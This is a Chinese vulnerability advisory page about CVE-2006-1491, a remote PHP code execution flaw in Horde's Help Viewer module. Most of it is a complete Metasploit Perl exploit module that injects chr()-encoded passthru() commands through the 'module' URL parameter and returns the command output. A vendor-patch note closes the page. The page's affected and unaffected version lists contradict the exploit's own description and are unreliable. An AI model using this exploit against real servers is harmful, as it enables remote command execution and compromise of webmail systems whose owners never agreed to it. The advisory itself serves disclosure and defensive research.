首页 -> 安全研究
安全研究
安全漏洞
Horde Help Viewer远程PHP代码执行漏洞
发布日期:2006-05-30
更新日期:2006-07-02
受影响系统:
Horde Horde 3.0.9不受影响系统:
Horde Horde 3.0.8
Horde Horde 3.0.7
Horde Horde 3.0.6
Horde Horde 3.0.5
Horde Horde 3.0.4
Horde Horde 3.0.3
Horde Horde 3.0.2
Horde Horde 3.0.1
Horde Horde 3.0
Horde Horde 3.1.1描述:
Horde Horde 3.0.10
BUGTRAQ ID: 17292
CVE(CAN) ID: CVE-2006-1491
Horde是个以PHP为基础的架构,用来创建网络应用程式。
Horde Webmail应用处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
由于Horde Help Viewer模块代码实现上的问题,远程攻击者可以直接在CGI参数中注入PHP代码在服务器上执行。
<**>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Title: Horde <= 3.0.9, 3.1.0 (Help Viewer) Remote PHP Code Execution Vulnerability
# Name: horde_help_module.pm
# License: Artistic/BSD/GPL
# Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/projects/Framework for more information.
#
## Coded by Inkubus <inkubus@inbox.lv>
package Msf::Exploit::horde_help_module;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
my $advanced = { };
my $info = {
'Name' => 'Horde help viewer module remote PHP code execution',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'inkubus < inkubus [at] inbox.lv >' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the Horde help module', '/horde/services/help/'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits an arbitrary PHP code execution flaw in the Horde web
mail software. This vulnerability is only present in the "Help Viewer Module".
Horde versions 3.0 up to 3.0.9 and 3.1.0 are vulnerable.
}),
'Refs' =>
[
['OSVDB', '15945'],
['CVE', '2006-1491'],
],
'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
},
'Keys' => ['horde'],
'DisclosureDate' => 'Mar 28 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
# Add an echo on each end for easy output capturing
$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";
# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
# Create the get request data
#my $data = "?do=page&template={\${passthru($byte)}}";
my $data = "?show=about&module=;\".passthru($byte);'.";
my $req =
"GET $path$data HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Content-Type: application/html\r\n".
"Content-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Sending the malicious Horde request...");
$s->Send($req);
my $results = $s->Recv(-1, 20);
$s->Close();
if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
my $out = $1;
$out =~ s/^\s+|\s+$//gs;
if ($out) {
$self->PrintLine('----------------------------------------');
$self->PrintLine('');
$self->PrintLine($out);
$self->PrintLine('');
$self->PrintLine('----------------------------------------');
}
}
return;
}
1;
建议:
厂商补丁:
Horde
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.horde.org
浏览次数:3644
严重程度:0(网友投票)
绿盟科技给您安全的保障